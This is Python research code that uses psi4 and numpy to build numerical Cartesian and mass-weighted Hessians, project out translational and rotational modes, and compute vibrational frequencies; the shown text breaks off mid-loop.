#print("mass_unit = %12.5e freq2[6:10]" % mass_unit,freq2[6:10])
freq = scale * np.sqrt(freq2)
ck_print("\n Frequency (1/cm) from dir hess + mat eigenvals (au) ")
#print("vib freq from hess:",freq)
sum_str = ""
if not long_freq_out:
psi4.core.print_out("\n===== Freq in 1/cm")
for ivec in range(mat_dim):
#print("ivec %d %10.3f -- ev %16.7f 1/ev %16.7f"
# % (ivec,freq[ivec],freq2[ivec],1./freq2[ivec]))
if long_freq_out:
format("ivec %d %10.3f 1/cm -- actual ev %16.7f 1/ev %16.7f"
% (ivec,freq[ivec],freq3[ivec],1./freq3[ivec]))
else:
if len(sum_str) > 75:
print(sum_str)
sum_str = ""
sum_str += "%3d %8.1f " % (ivec,freq[ivec])
# print out end of sum_str
if not long_freq_out and len(sum_str) > 0:
print(sum_str)
#print("ref_freq:\n",ref_freq)
#####################################################################
#
# add in reduce mass calc using mass weightet evec from hessian
psi4.core.print_out("\n^^^^^^^^ going to compute reduced mass here ^^^^^^^^")
#
#####################################################################
if ref_freq is None:
# print out just frequencies
psi4.core.print_out("\n========= print out straight freq and their inverse here")
else: # compare computed freq against ref_freq
for imode in range(mat_dim):
#if ref_freq[imode] < 5.0:
#ratio = 0.5
#else:
freq_diff = ref_freq[imode]-freq[imode]
if np.abs(freq_diff) > 10.:
freq_diff = ref_freq[imode]/freq[imode]
#ratio = ref_freq[imode]/freq[imode]
psi4.core.print_out("\ndiff ref_freq[%2d] - cmp_freq[%2d] = %9.3f - %9.3f = %10.4f"
% (imode,imode,ref_freq[imode],freq[imode],freq_diff))
psi4.core.print_out("\n============ End of diagonalizing mass weighted Hess ===================")
return 0, freq,evec
def test_mwthess_projd(hess,tran_rot_v,detscl=1.,inv_hess=False,
test_thres=1.e-10):
""" routine to check if the trans/rot modes in the mwt_hess have zero frequency
return
------
tranrot_projd: bool
True if tran/rot frequencies are zero and no projection needed or False otherwise
"""
(mat_dim,no_tr_rot_v) = tran_rot_v.shape
hess_trv = np.dot(hess,tran_rot_v)
v_hess_v = np.dot(tran_rot_v.T,hess_trv)
ck_print("tran_rot_v.T*hess*tran_rot_v = ",v_hess_v)
abs_diagsum = 0.
for ii in range(no_tr_rot_v):
abs_diagsum += np.abs(v_hess_v[ii,ii])
tracevhv = np.trace(v_hess_v)
psi4.core.print_out("\n\n Trace of v_hes_v = "+ str(np.trace(v_hess_v)))
psi4.core.print_out("\nAbs trace of v_hess_v = " + str(abs_diagsum))
# could add here a return True if tracevhv < some threshold
if abs_diagsum < test_thres:
psi4.core.print_out("\nTest_mwthess_projd trace < test_thres = %10.4e" % test_thres,
"no need to do Trans/Rots projection")
#return True
# unit conversion
hartree2waveno = 219474.6
#print("hartree2waveno = %f" % hartree2waveno)
au2amu = 5.485799097e-04
sqrt_au2amu = np.sqrt(au2amu/1000.) # convert amu from g to kg
#Evib = hbar * omega = hbar * sqrt(k/m)
radpsec2waveno = hartree2waveno*sqrt_au2amu
psi4.core.print_out("\nau2amu %f inv(au2amu) %f -- radpsec2waveno %f" % (au2amu,1./au2amu,radpsec2waveno))
# diagonalize v_hess_v and check out eigenvectors
# find eigenvals and evecs of rot_orthog_chk
vhv_eval,vhv_evec= scipy.linalg.eigh(v_hess_v)
# set up mass_unit
mass_unit = detscl/1000. # corrects atomic masses when unit
if inv_hess:
psi4.core.print_out("\n projecting inv_hess - scale vhv_eval by mass_unit = %.9f" % mass_unit)
vhv_eval *= mass_unit
else:
psi4.core.print_out("\nprojecting hess - divide vhv_eval by mass_unit = %.9f" % mass_unit)
vhv_eval /= mass_unit
psi4.core.print_out("\n\nv_hess_v evals and evecs: sum = %.10e" % np.sum(np.abs(vhv_eval)))
for iv in range(len(vhv_eval)):
#tmp_vec = np.abs(vhv_evec[:,iv])
ord_vec = np.argsort(np.abs(vhv_evec[:,iv]))[::-1]
if vhv_eval[iv] >= 0.:
eval_cm = radpsec2waveno*np.sqrt(vhv_eval[iv])
else:
eval_cm = -radpsec2waveno*np.sqrt(-vhv_eval[iv])
psi4.core.print_out("\nvhv_eval[%d] = %f freq = %9.3f 1/cm abs_sort max-> "
% (iv,vhv_eval[iv],eval_cm) + str(ord_vec))
ck_print("evec:", vhv_evec[:,iv])
if abs_diagsum < test_thres:
return True
else:
psi4.core.print_out("\nTest_mwthess_projd trace not below %10.5e" % test_thres +
" - need to project out mwthess Trans/Rots modes")
return False
def proj_trans_rots_frm_hess(hess,tran_rot_v,detscl=1.,inv_hess=False,ref_freq=None):
""" routine to project out trans/rotational modes from hess and get new freqs
hess needs to be symmetrical
method uses just 5 or 6 linear combinations of tran_rot_v vectors in projection
Parameters
----------
hess: ndarray
mwt-hess or inv-hess
tran_rot_v: ndarray
detscl: float
= 1. if 'atmwt' and = X. if 'unit'
inv_hess: bool
ref_freq: ndarray
list of frequency for comparison with freq from proj hessian
Returns
-------
0,proj_hess,proj_eval,proj_evec
"""
psi4.core.print_out("\n\n\n===== Projecting trans/rots modes out of mass weighted hess =====")
ck_print("hess in proj_trans_rots:\n",hess[:,:5])
ck_print("tran_rot_v.shape = ",tran_rot_v.shape)
#
# get dimension info
(mat_dim,no_tr_rot_v) = tran_rot_v.shape
psi4.core.print_out("\nLen of normal mode vector = %d no tran rot vecs = %d" % (mat_dim,no_tr_rot_v))
# checking whether tran/rot eigenvalues are zero before calling proj_trans_rots_frm_hess
# therefor skip this
#tran_rot_zero = test_mwthess_projd(hess,tran_rot_v,detscl=detscl,inv_hess=inv_hess)
# method uses the projector P = 1 - sum_i v[:,i] * v[:,i]
# where i runs over all the trans + rot vibrational modes
# then form proj_hess = P * hess * P
#print("\n ======= Projecting trans/rots out of mwt hessian matrix -->")
proj = np.identity(mat_dim,dtype=float)
for iv in range(no_tr_rot_v):
proj -= np.outer(tran_rot_v[:,iv],tran_rot_v[:,iv])
#print("proj.shape =",proj.shape)
#print(proj)
proj_hess = np.linalg.multi_dot([proj,hess,proj])
#print("proj_hess.shape = ",proj_hess.shape)
psi4.core.print_out("\n\n ===== Finished projecting the trans/rot modes out of mwt hess matrix")
max_off_diff =0.
for icol in range(1,mat_dim):
for jcol in range(icol):
diff = np.abs(proj_hess[icol,jcol] - proj_hess[jcol,icol])
if diff > max_off_diff:
max_off_diff = diff
ii = icol
jj = jcol
if max_off_diff > 1.e-10:
psi4.core.print_out("\n***WARNING*** [%2d,%2d] max_off_diff_proj_hess2 = %e" % (ii,jj,diff))
# freq_calc reminder
# calc freqs separate to proj fn
#ret_code,proj_eval,proj_evec = freq_calc(proj_hess,detscl=detscl,ref_freq=ref_freq,
# freq_out=True,inv_hess=inv_hess)
# check that the projected hessian is gives tran_rot_zero = True
# projection seems to be working - so there is not need to do this - keep as check for now
#
# add the following 2 lines of code if you want to check if projection working correctly
#tran_rot_zero = test_mwthess_projd(proj_hess,tran_rot_v,detscl=detscl,inv_hess=inv_hess)
#print("test_mwthess_projd = %s after projecting hessian" % tran_rot_zero)
#return 0,proj_hess,proj_eval,proj_evec
return 0, proj_hess
```
#### File: johndhead/build_num_cartormwt_hessian/jdh_build_hess.py
```python
import psi4
import numpy as np
import hess_freq as hsf
import hess_setup_anal as hsa
import wrt_rd_dict_to_json as sav_psi4opt
import os, sys
################################################################
class Pcprint:
"""
sets up printing for jdh_build_hess.py
"""
#def __init__(self,prt_out_fname=None):
def __init__(self):
self._prt_out_fname = None
self._psi4_out_close = None
@property
def prt_out_fn(self):
return self._prt_out_fname
@prt_out_fn.setter
def prt_out_fn(self,prt_out_fname):
self._prt_out_fname = prt_out_fname
# TODO: add more here?
# test open_file
print('prt_out_fname = %s' % prt_out_fname)
#self._psi4_outf = open(self._prt_out_fname,"w")
self._psi4_out_close = "open"
###### PROBLEM HERE: return self._psi4_outf
# with psi4 file name
# psi4.come_set_output(self._prt_out_fname)
# psi4.core.set_output_file(self._prt_out_fname)
# return "opened psi4 output file"
@property
def prt_out_close(self):
return self._psi4_out_close
@prt_out_close.setter
def prt_out_close(self,prt_out_close):
if prt_out_close == "close":
self._psi4_out_close = prt_out_close
return "closed psi4_output_file"
else:
return "GOTTA PROBLEM: psi4 output file was not closed"
def pcprint(self,prt_txt,file=None):
if file is None:
# need to used psi4 print_out
if self._psi4_out_close =="open":
# print("PSI4out:"+prt_txt)
psi4.core.print_out(prt_txt)
elif self._psi4_out_close == "close":
# print("psi4_prt_cls STD_OUT:"+prt_txt)
psi4.print_stdout("\npsi4_prt_cls STD_OUT:"+prt_txt)
else:
psi4.print_stdout("\npsi4_prt_not_open_yet STD_OUT:"+prt_txt)
else:
print(prt_txt,file=file)
# modify print commands so general print uses psi4.core.print_out()
# def pcprint(prt_txt,file=None):
# """
# modifies regular prints to psi4.core.print_out()
# :param prt_txt: "text to be printed"
# :param file: == None if no file - otherwise name of file to get output
# :return:
# """
# if file is None:
# psi4.core.print_out(prt_txt)
# else:
# print(prt_txt,file=file)
# # all done
# set up energy_grad function
def hess_en_gr_fun(coords, *args):
""" hess_en_gr_fun - calcs energy and gradient for mol
coords = coords to calculate the energy - initially set to zero
mol_coords = init_coords + coords
args = (mol, eg_opts, init_coords, init_com, atom_mass, mass_detscl, coord_type)
where:
mol = molecule class name
eg_opts = options for energy and grad calcs
init_coords such that coords are zero initially
init_com = initial center of mass when coords = zero
inv_sqrt_mass = 1/sqrt(atom_mass) - used when coord_type = 'atmwt' or 'utmwt'
coord_type posibilities so far: 'cart','masswt'
function returns scf_e and grad
"""
#print("<<<<<<<< hess_en_gr_fun coords: ",coords)
#print("no of args in *args = %d" % len(args))
psi4.core.print_out("disp coords for hess_en_gr_fun -->")
psi4.core.print_out(str(coords))
if len(args) == 7:
(mol,eg_opts,init_coords,init_com,atom_mass,mass_detscl,coord_type) = args
#print("mol =",mol)
print("in hess_en_gr_fun: mol =",mol)
#print("dir(mol): ->\n",dir(mol))
#print("init_coords =",init_coords)
#print("inv_sqrt_mass =",inv_sqrt_mass)
#print("coord_type = %s"% coord_type)
nat = mol.natom()
if coord_type == 'cart':
# if coord_type == 'cart' or coord_type == "mwtcart":
# coords equal linear array len 3*mol.natom()
#debug -- print("cart disp coords: ",coords)
pass
elif coord_type == 'masswt':
# elif tmasswt(coord_type):
# TODO: need to check mass weighting correct
# coords are mass weighted - convert to cartessian
inv_sqrt_mass = 1./np.sqrt(atom_mass)
coords = coords * inv_sqrt_mass # cartesian displacment
#debug -- print("masswt disp coords: ",coords)
else:
print("*** Error not set up for coord_type = %s" % coord_type)
sys.exit()
geom = np.reshape(coords,(nat,3)) + init_coords
print("hess_en_gr_fun: mol geom ->\n",geom)
# calc com
tot_m = np.sum(atom_mass[::3])
test_com = np.dot(geom.T,atom_mass[::3])
print("mol mass = %10.3f test_com = " % tot_m, test_com/tot_m)
# fix center of mass and orientation
mol.fix_com(True)
mol.fix_orientation(True)
print("%s com_fixed = %s orientation_fixed = %s" % (mol.name(),
mol.com_fixed(), mol.orientation_fixed()))
psi4.core.print_out("\n Skip printing initial coordinates in hess_en_gr_fun()")
#print_mol_coord_sum(mol,opt_stage="Initial")
mol.set_full_geometry(psi4.core.Matrix.from_array(geom))
# the next line causes the center-of-mass to move - see what happens
# without it
mol.update_geometry()
#psi4.core.print_out("new mol geom: \n")
# print_mol_coord_sum(mol,opt_stage="New CART")
#for iat in range(mol.natom()):
#print("atom %d %3s %9.5f xyz coord = " % (iat,mol.symbol(iat),mol.mass(iat)),mol.xyz(iat))
#print("\n===== co bond distance = %10.5f a.u." % (mol.z(1)-mol.z(0)))
cxcom = mol.center_of_mass()[0]
cycom = mol.center_of_mass()[1]
czcom = mol.center_of_mass()[2]
#print("cxcom,cycom,czcom: ",cxcom,cycom,czcom)
current_com = np.array([cxcom,cycom,czcom],dtype=float)
com_dif = current_com - init_com
psi4.core.print_out("\n ++++ current com = %18.10f %18.10f %18.10f"
% (current_com[0],current_com[1],current_com[2]))
psi4.core.print_out("\n ++++ diff = curr - init = %18.10f %18.10f %18.10f a.u.\n"
% (com_dif[0],com_dif[1],com_dif[2]))
# get inertia tensor and rotational consts
# inert_ten = np.array(mol.inertia_tensor())
# cur_rotc = np.array(mol.rotational_constants())
# psi4.core.print_out("\ncurrent rot consts: %15.9f %15.9f %15.9f" % (cur_rotc[0],cur_rotc[1],cur_rotc[2]))
# psi4.core.print_out("\ninert_ten -->\n")
# psi4.core.print_out(str(inert_ten))
# # calc evals and evecs for inertia_tensor
# teval,tevec = np.linalg.eigh(inert_ten)
# psi4.core.print_out("\n Eigen vals and vecs from inertia tensor")
# for ivec in range(3):
# psi4.core.print_out("\neval[%d] = %12.8f vec = (%11.8f, %11.8f, %11.8f)"
# % (ivec,teval[ivec],tevec[ivec,0],tevec[ivec,1],tevec[ivec,2]))
#
scf_e,wavefn = psi4.energy(eg_opts,return_wfn=True)
psi4.core.print_out("\n++++++++ scf_e in en_fun = %18.9f\n" % scf_e)
#print("++++++++ scf_e in en_fun = %18.9f" % scf_e)
G0 = psi4.gradient(eg_opts,ref_wfn=wavefn)
gvec = np.array(G0)
#jdhd - usually comment out this line 21-dec-2019
#print("+=+=+=+=+ Cart gradient vector: \n", gvec)
grad = np.reshape(gvec,(len(coords),))
if coord_type == "masswt":
# if tmasswt(coord_type):
grad *= inv_sqrt_mass
#print("=+=+=+=+ Mass wt grad vector: \n",grad)
#print("+=+=+=+ grad as a linear array -->",grad)
#print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
return scf_e, grad
####################### end hess_en_gr_fun #################################
def jdh_build_num_hess(mol_nm,run_type_op,jopts,pc= None):
""" function to build jdh numerical hessian
:parameter mol_nm: molecule name
:parameter run_type_op: dictionary with the parameters for hessian build types
:parameter jopts: dictionary with the psi4 options for the energy/grad calcs
remember psi4 options are read from the numpy.json file
"""
# check that pc is an instance of the Pcp class
if isinstance(pc,Pcprint):
pc.pcprint("\n pc class is instance of Pcp class and is defined")
else:
# Define pc
pc = Pcprint()
pc.pcprint("\n Created pc = Pcprint() class for print_out - presumably need to open outfile")
pc.pcprint(f"\n pc.prt_out_fn = {pc.prt_out_fn} -- pc.prt_out_close = {pc.prt_out_close}")
# Memory specification
psi4.set_memory(int(5e8))
numpy_memory = 2
# Set output file
# TODO: originally dat --> out
#psi4.core.set_output_file('output.out', False)
# Define Physicist's water -- don't forget C1 symmetry!
# mol = psi4.geometry("""
# O
# H 1 1.1
# H 1 1.1 2 104
# symmetry c1
# """)
##########################################################################
# start of setting up atomic coords, masses for different molecules
# use_psi4_data = True if obtaining molecular info via psi4
# in current program inithess_type - testing program with some simple molecules
# set use_psi4_data = False
#########################################################################
#### check out using __file__
print("check __file__ ",__file__)
print("get __file__ abspath: ",os.path.abspath(__file__))
# use_psi4_data = False # set false when not using psi4 data
use_psi4_data = True
# (a) set up psi4 data
# below is the psi4 setup
if use_psi4_data:
# list contents of the 'run_type_op" dictionary
print("=========== Parameters used in the jdh_build_num_hess pgm =============")
print("run_type_op = ",run_type_op)
npy_file = f"{run_type_op['npy_file']}.npy"
json_file = f"{run_type_op['npy_file']}.json"
nthread = 6
psi4.set_num_threads(nthread)
# setup np print options
print("get_print_options: ", np.get_printoptions())
np.set_printoptions(precision=6, linewidth=120)
#wfn_file_name = "h2co_scf_wfn"
wfn_file_name = "h2co_opt_wfn_dir"
wfn_file_name = run_type_op['npy_file']
file_wfn = psi4.core.Wavefunction.from_file(wfn_file_name + '.npy')
# new output file naming setup
# add extension to out file name = "_{geom_type}_{disp_type}_{disp}
# original: out_ext = f"_{run_type_op['mol_geom'][:4]}_{run_type_op['coord_type'][0:4]}_{int(100*run_type_op['disp'])}"
out_ext = f"_{run_type_op['coord_type'][0:4]}_{int(100*run_type_op['disp'])}"
print("file_name extension =",out_ext)
mol_nm = run_type_op['mol_nm']
output_file = run_type_op['npy_file']+out_ext
psi4.core.set_output_file(output_file +'.out', False)
pc.prt_out_fn = output_file + '.out'
# set up energy and grad summary files
en_sum = open("en_sum_"+output_file+".txt","w")
grad_sum = open("gr_sum_"+output_file+".txt","w")
pc.pcprint("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
(file_wfn.molecule().name(),file_wfn.energy()), file=en_sum)
pc.pcprint("\n RUN_TYPE_OP:-->\n"+str(run_type_op)+"\n",file=en_sum)
#pc.pcprint("\n RUN_TYPE_OP: ",run_type_op,"\n",file=en_sum)
pc.pcprint("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
(file_wfn.molecule().name(),file_wfn.energy()), file=grad_sum)
pc.pcprint("\n RUN_TYPE_OP:-->\n"+str(run_type_op)+"\n",file=grad_sum)
#######################################################################
psi4.core.print_out("\n ============ Get initial molecule info using "
"%s.npy "
"data\n" % wfn_file_name)
psi4.core.print_out("Initial molecular geom obtained from %s.npy file\n"
% wfn_file_name)
# get current module and print out options
# print("current_module_name: %s" % current_module_name)
# curr_mod_name = psi4.core.get_current_module()
#curr_mod_name = psi4.core.Options.get_current_module()
# --or-- ...get_current_module(file_wfn)
# print("Options for curr_mod_name = %si -->" % curr_mod_name)
pc.pcprint("dir(psi4.core.Options) -->\n")
pc.pcprint(str(dir(psi4.core.Options))+"\n")
pc.pcprint("dir(psi4.core.Wavefunction) -->\n")
pc.pcprint(str(dir(psi4.core.Wavefunction))+"\n")
# try printing out some options
# pc.pcprint("List of options -->\n",psi4.core.get_options())
# get list of info available from wavefunction file
# pc.pcprint("\n======== type(file_wfn) --> ",type(file_wfn))
# pc.pcprint("dir(file_wfn) -->\n",dir(file_wfn))
# Let us see if file_wfn has frequencies
# NOT WORKING ??
# print("\nFor file_wfn - lets see if Freq exist")
# file_wfn_freq = np.asarray((file_wfn.frequencies()))
# print("\ndir(file_wfn.frequencies) -->\n",dir(file_wfn.frequencies))
# print("\nfile_wfn_freq = ",file_wfn_freq)
#
# wfn_print_freq = file_wfn.frequencies().print_out()
# print("\n freq print again: ",wfn_print_freq)
# print("\n freq print again as np.array: ",np.asarray(wfn_print_freq))
file_mol = file_wfn.molecule()
pc.pcprint("\n======== type(file_mol) -> "+str(type(file_mol))+"\n")
pc.pcprint("\n======== dir(file_mol) --> \n"+str(dir(file_mol))+"\n")
# print("\n++++ Check if file_mol_freq exist",np.asarray(file_mol.frequencies()))
# pc.pcprint( "\n\n=============================================================")
# pc.pcprint("\n======== type(file_wfn.molecule()) -> ",type(file_wfn.molecule))
# pc.pcprint("\n======== dir(file_wfn.molecule()) --> ",dir(file_wfn.molecule()))
# check that mol_nm == mol_nm
mol_name = file_mol.name()
if mol_nm == mol_name:
pc.pcprint(f"YEAH mol_nm = {mol_nm} matches with mol_name = {mol_name} in file_wfn ++++++")
else:
pc.pcprint(f"ERROR mol_nm = {mol_nm} NOT == mol_name = {mol_name} in file_wfn ++++++")
sys.exit()
num_file_at = file_mol.natom()
file_geom = np.asarray(file_mol.geometry())
pc.pcprint("no_ats in %s molecule = %d file_geom.shape = %s \n" % (
mol_name, num_file_at,str(file_geom.shape)))
npmass = np.asarray([file_mol.mass(iat) for iat in range(num_file_at)])
pc.pcprint("\n=========================================================")
pc.pcprint(" %s --- Units = %s" % (
file_wfn.molecule().name(), file_wfn.molecule().units()))
pc.pcprint(" x y z mass")
# included atom symbol (label) in print out
at_label = []
# set up a coordinate string
opt_mol_geom_setup = ""
for iat in range(num_file_at):
at_label.append(file_wfn.molecule().label(iat))
pc.pcprint("%3d %2s %12.7f %12.7f %12.7f %12.7f" % (iat, at_label[iat],
file_geom[iat, 0],
file_geom[iat, 1],
file_geom[iat, 2],
npmass[iat]))
atom_str = " %2s %20.12f %20.12f %20.12f\n" % \
(at_label[iat], file_geom[iat,0],
file_geom[iat,1], file_geom[iat,2])
opt_mol_geom_setup += atom_str
opt_mol_geom_setup += "\n no_com \n no_reorient \n symmetry c1 \n " \
"units bohr"
pc.pcprint("opt_mol_geom_setup -->\n"+opt_mol_geom_setup)
pc.pcprint("\n=========================================================\n")
pc.pcprint("\nPsi4 %s center of mass = %s" % (file_wfn.molecule().name(),
str(file_wfn.molecule().center_of_mass())))
pc.pcprint("\nPsi4 %s rotational consts =" % file_wfn.molecule().name())
pc.pcprint("\n"+ str(file_wfn.molecule().rotational_constants().np))
pc.pcprint("\nand inertia tensor =>\n" + str(file_wfn.molecule().inertia_tensor().np))
pc.pcprint("\nPsi4 fixed com = %s fixed orientation = %s" % (
file_wfn.molecule().com_fixed(),
file_wfn.molecule().orientation_fixed()))
# In[8]:
# get list of info available from wavefunction file
#print("dir(file_wfn) -->\n",dir(file_wfn))
# print("dir(genmol_wfn) -->\n",dir(genmol_wfn))
#print("\n======== dir(file_wfn.molecule()) --> ",dir(file_wfn.molecule()))
# pc.pcprint(" Name of molecule = file_wfn.molecule.name()? = %s" %
# file_wfn.molecule().name())
pc.pcprint("\nfile_wfn.basisset().name() = %s " % file_wfn.basisset().name())
pc.pcprint("\nfile_wfn.basisset().nbf() = %d "% file_wfn.basisset().nbf())
pc.pcprint("\nfile_wfn.nirrep() = %d" % file_wfn.nirrep())
psi4.core.print_out("\nMolecule name: %s" % file_wfn.molecule().name())
psi4.core.print_out("\n Energy = %21.14f" % file_wfn.energy())
pc.pcprint("=========== End of working with numpy nphess <= file_wfn.hess ====")
pc.pcprint("\n=========================================================")
# set up opt_mol - separate class to molecule in hess file
opt_mol = psi4.geometry(opt_mol_geom_setup)
opt_mol.set_name(mol_name)
# Computation options
# psi4.set_options({'basis': 'aug-cc-pvdz',
# 'scf_type': 'df',
# psi4.set_options({'basis': '6-31g',
# check to see if optim converges in 1 step with aug-cc-pvdz basis
# psi4.set_options({'basis': 'aug-cc-pvdz',
# 6-31g basis takes a few steps to converge
# psi4.set_options({'basis': '6-31g',
# # check options before resetting them again
# test_opts =['basis','reference','scf_type']
# ################ TODO: play with this???
# test_opts = [psi4.core.get_options()]
# print("List psi4 options before reseting below -->\n",test_opts)
# print("dir(test_opts): ",dir(test_opts))
pc.pcprint("End of psi4_options ============================")
# # TODO: add jdh options here ------------------
# # compare local options in jopts with psi4 global options
# # goal of jopts dictionary is to same psi4 options when building john's num hessian
# # print("set {", file=f_init_geom)
# invalid_jopt_keys = ['formed_by_job', 'npy_file'] # add other keys which are NOT valid psi4 options
# for key in invalid_jopt_keys:
# #try:
# psi4.core.print_out(f"\ndeleting jopts[{key}] = {jopts[key]} from jopts")
# del jopts[key]
# #except KeyError as k:
# # psi4.core.print_out("key {key} not in jopts ",k)
# psi4.core.print_out(f"\njopts has been pruned: {jopts}")
# find invalid psi4 keys in jopts dictionary and save them in a list: invalid_jopts_keys
invalid_jopts_keys = []
psi4.core.print_out("\n### start of comparing psi4 global options with jdh options")
for key in jopts.keys():
psi4.core.print_out(f"\n {key} {jopts[key]}")
try:
glob_op = psi4.core.get_global_option(key)
if key == "geom_maxiter":
local_scf_op = glob_op
psi4.core.print_out("\nInvalid SCF local key skipped")
else:
local_scf_op = psi4.core.get_local_option('SCF',key)
psi4.core.print_out(f"\njopts key = {key} - local_scf_op = {local_scf_op} - global_op = {glob_op}")
if glob_op != jopts[key]:
psi4.core.print_out(f"\njopts['{key}'] != glop_op - resetting glob_op")
psi4.core.set_global_option(key,jopts[key])
new_glob_op = psi4.core.get_global_option(key)
if key == "geom_maxiter":
new_local_scf_op = new_glob_op
psi4.core.print_out("\nInvalid SCF local key skipped")
else:
new_local_scf_op = psi4.core.get_local_option('SCF',key)
psi4.core.print_out(f"\nNOW: local_scf_op = {new_local_scf_op} - global_op = {new_glob_op}")
# check for option change
except RuntimeError as kerr:
psi4.core.print_out(f"\n{kerr}: jopts key {key} not a valid key")
invalid_jopts_keys.append(key)
psi4.core.print_out("\n++++++ End of comparing psi4 global options with jdh options")
# See what happens if we use the jopts dictionary to set the options???
# psi4.set_options(jopts)
#
# # for to in test_opts:
# # print(f"Option --{to} =",psi4.core.get_option(to))
#
# # psi4.set_options({'basis': 'aug-cc-pvdz',
# psi4.set_options({ 'basis': '6-31g**',
# 'reference': 'rhf',
# 'scf_type': 'direct',
# 'e_convergence': 10,
# 'd_convergence': 10,
# 'ints_tolerance': 10})
#
# # 'print_mos': True})
#
# # probably show check energy type and list options later??
# Get the SCF wavefunction & energies for H2O
# scf_e0, scf_wfn = psi4.energy('scf', return_wfn=True)
# print("A float and a Wavefunction object returned:", scf_e0, scf_wfn)
# setup energy_gradient options
# eg_opts = 'scf'
# print("energy/gradient options: %s" % eg_opts)
# put fixed geom data here
####################################################################
# start of some simple molecules to test lindh approx hessian idea
else:
# case 0 - set up molecular data for H-Be-H
mol_name = "H-Be-H"
# Setup atoms: at_labels, coordinates(mol_geom) and their masses (npmass)
at_label = ['H', 'Be', 'H']
d = 2.1 # Be-H bondlength in atomic units (need to check)
mol_geom = np.array(
[[0., 0., -d], [0., 0., 0., ], [0., 0., d]], dtype=float)
# orig Be =4 huh? # npmass = np.array([1., 4., 1.], dtype=float)
npmass = np.array([1., 9., 1.], dtype=float)
num_at = len(npmass)
units = "Angstrom"
############ end-of-case 0 ################
pc.pcprint("\n++++++++++++++++++++++ Molecular data for %s ++++++++++++++++++++++"
% mol_name)
pc.pcprint("====================================================================\n")
pc.pcprint("num_at in %s molecule = %d mol_geom.shape = " %
(mol_name, num_at), mol_geom.shape)
print("\n=========================================================")
# print(" %s --- Units = %s" % (file_wfn.molecule().name(),
# file_wfn.molecule().units()))
pc.pcprint(" %s --- Units = %s" % (mol_name, units))
pc.pcprint(" x y z mass")
# included atom symbol (label) in print out
for iat in range(num_at):
pc.pcprint("%3d %2s %12.7f %12.7f %12.7f %12.7f" % (iat, at_label[iat],
mol_geom[iat, 0],
mol_geom[iat, 1],
mol_geom[iat, 2],
npmass[iat]))
pc.pcprint("\n=========================================================")
# calc first energy and gradient here
# ref_scf_e,ref_wavefn = psi4.energy(eg_opts, return_wfn=True)
# psi4.core.print_out("\n++++++++ ref_scf_e in main = %24.14f\n" % ref_scf_e)
# G0 = psi4.gradient(eg_opts,ref_wfn=ref_wavefn)
# gvec = np.array(G0)
#psi4.core.print_out("\n ref grad vec ->")
#psi4.core.print_out(str(gvec))
# now set up args to call hess_en_gr_fun function to get energy and gradient
# check that mol = active molecule
# mol = file_mol
mol = file_wfn
if mol == psi4.core.get_active_molecule():
psi4.core.print_out("\n mol = active mol: name = %s" % mol.name())
pc.pcprint("\n mol = active mol =",mol)
else:
mol = psi4.core.get_active_molecule()
psi4.core.print_out("\n mol set to active molecule: name = %s" % mol.name())
pc.pcprint("\n mol set to active molecule = %s" % mol)
eg_opts = 'scf'
init_coords = file_geom
init_com = np.asarray([mol.center_of_mass()[ix] for ix in range(3)])
pc.pcprint("\n in args - init_com =" + str(init_com))
num_at = len(npmass)
atom_mass = np.ones(3*num_at, dtype=float)
for ix in range(3):
atom_mass[ix::3] =npmass
mass_detscl = 1.
args = (mol, eg_opts, init_coords, init_com, atom_mass, mass_detscl, coord_type)
pc.pcprint("\n args --> \n"+ str(args))
# xdisp is the coordinate displacement (in mass wt atomic units?)
# set xdisp to zero initially
# set up energy and grad summary files
# en_sum = open("en_opt_sum.txt","w")
# grad_sum = open("grad_opt_sum.txt","w")
# print("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
# (file_wfn.molecule().name(),file_wfn.energy()), file=en_sum)
# print("\n++++ WFN Molecule name: %s WFN Energy %28.20f \n" %
# (file_wfn.molecule().name(),file_wfn.energy()), file=grad_sum)
# set up np arrays with energies, grad_vectors, disp_labels for ref_geom and 6*num_at displacements
nrows = 6*num_at + 1
en_array = np.zeros((nrows,2),dtype=float)
# gr_array stores the init geom gradient (ref_grad) vectors for ref geom
# and then the change in gradient for displacements (dis_grad - ref_grad)
#
gr_array = np.zeros((nrows,3*num_at),dtype=float)
dis_label = np.zeros((nrows,3),dtype=int)
fin_dif_2deriv = np.zeros((3*num_at,3*num_at),dtype=float)
# get ref energy and gradient vec at initial geom
xref = np.zeros(len(atom_mass))
ref_e,ref_grad = hess_en_gr_fun(xref, *args)
# set ref en and grad values in np arrays
en_array[0,1]=ref_e
gr_array[0,:] = ref_grad
psi4.core.print_out("\n++++++++ ref_scf_e in main = %24.14f\n" % ref_e)
psi4.core.print_out("\n ref grad vec ->")
psi4.core.print_out(str(ref_grad))
pc.pcprint("ref energy = %24.15f" % ref_e,file = en_sum)
pc.pcprint("ref grad = ",file=grad_sum)
for jat in range(num_at):
jat3 = 3 * jat
pc.pcprint("at %2d G: %14.6e %14.6e %14.6e DG: %14.6e %14.6e %14.6e "
% (jat, ref_grad[jat3], ref_grad[jat3 + 1], ref_grad[jat3 + 2],
0.,0.,0.,),
file=grad_sum)
psi4.core.print_out("\n\n++++++ Start of doing coord displacements ++++++\n\n")
# set up coordinate displacement
coor_disp = run_type_op["disp"]
pc.pcprint(f"\n+++ coor_disp = {coor_disp} disp_type = {run_type_op['coord_type']} coord_unit = {run_type_op['coord_unit']} \n", file=en_sum)
pc.pcprint(f"\n+++ coor_disp = {coor_disp} disp_type = {run_type_op['coord_type']} coord_unit = {run_type_op['coord_unit']} \n", file=grad_sum)
# now displace each atom in turn and calc energy and grad
plus_min = [1.,-1.]
row_cnt = 0
for iat in range(num_at):
iat3 = 3*iat
for icor in range(3):
for pm in plus_min:
row_cnt += 1
pc.pcprint("\n calc disp %3d iat = %2d ic =%d pm = %3f" % (row_cnt, iat,icor,
pm))
xdisp = np.zeros_like(xref)
xdisp[iat3+icor] += coor_disp*pm
dis_e, dis_grad = hess_en_gr_fun(xdisp, *args)
del_e = dis_e - ref_e
del_grad = dis_grad - ref_grad
dis_label[row_cnt,:] = np.array([iat,icor,int(pm)],dtype=int)
en_array[row_cnt, 0] = del_e
en_array[row_cnt, 1] = dis_e
gr_array[row_cnt,:] = del_grad
# gr_array[row_cnt, 3:6] = ref_grad
# form 2 deriv matrix
if pm > 0:
